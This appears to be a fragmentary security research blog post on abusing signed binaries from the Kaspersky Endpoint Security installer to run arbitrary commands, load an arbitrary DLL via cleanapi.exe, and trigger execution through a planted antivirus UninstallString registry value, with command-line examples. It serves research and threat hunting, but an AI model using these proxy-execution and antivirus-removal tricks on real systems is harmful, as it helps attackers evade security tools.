LOLBINed — Using Kaspersky Endpoint Security “KES” Installer to Execute Arbitrary Commands

Introduction

kavremover

Kavremover Process Monitor
“actA7A1.tmp”
"C:\Users\lab\AppData\Local\Temp\actA7A1.tmp" run run-cmd "regsvr32.exe /u /s \"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security for Windows\mcou.dll\""
RT_RCDATA503.exe run run-cmd "cmd /c whoami > whoami.txt"
Execution

Kaspersky Endpoint Security (KES) Installer

KES Prompt
  • cleaner.cab
  • incompatible.txt
incompatible.txt
cleaner.cab

Hey, I Don’t Like Your AV…Can I Remove It

  • avg_free_av_2015_x64.ini
  • avg_free_av_2015_x86.ini
Content of “avg_free_av_2015_x64.ini”
detect-registry=HKEY_LOCAL_MACHINE\SOFTWARE\Avg\Avg2015
...
type=uninstall
...
env-registry=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG\UninstallString->UninstallString
  • Remove AVG from the system
  • Create registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Avg\Avg2015”
  • Create registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG\UninstallString” and point it at “notepad.exe”
Uninstall String
  • Run KES installer and see if notepad is spawned
Notepad executed

Do You Have This AV Installed?

Detect Security Products

Back to The “cleanapi.exe” Binary

Arbitrary DLL Load

"C:\Users\lab\AppData\Local\Temp\282527F5EDA44439AD3CC23FD270EE91\clr\flt\cleanapi.exe" -r -t 1 -n cleanapi.dll -d C:\Users\lab\AppData\Local\Temp\282527F5EDA44439AD3CC23FD270EE91\clr\flt\
cleanapi.exe -n malware.dll 
cleanapi.exe looking for malware.dll
Signed “cleanapi.exe”

Conclusion

  • We can use the signed binaries extracted from “kavremover.exe” or “cleanapi.dll” to execute arbitrary commands.
ExtractedBinary.exe run run-cmd [Command]
  • We can execute arbitrary commands from the context of the KES installer using the registry (or any installation method described in the INI files in theory) as described above.
  • You can “remove”/“detect” more than “2400” security products using Kaspersky Endpoint Security “KES” installer.
  • We can load arbitrary DLLs with the “cleanapi.exe” binary via the following command.
cleanapi.exe -n [MaliciousDLL]

Nasreddine Bencherchali

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.